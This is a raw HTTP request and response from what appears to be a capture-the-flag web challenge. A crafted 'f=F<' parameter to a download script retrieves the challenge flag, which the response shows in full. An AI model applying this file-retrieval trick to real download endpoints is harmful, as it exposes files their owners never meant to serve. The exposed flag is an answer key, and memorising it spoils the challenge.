GET /download.php?f=F< HTTP/1.1
Host: rup.chal.ctf.westerns.tokyo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://rup.chal.ctf.westerns.tokyo/
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2016 11:52:21 GMT
Server: Apache/2.4.20
X-Powered-By: PHP/7.0.7
Content-Length: 18
Connection: close
Content-Type: application/octet-stream

TWCTF{Hotto_Smile}
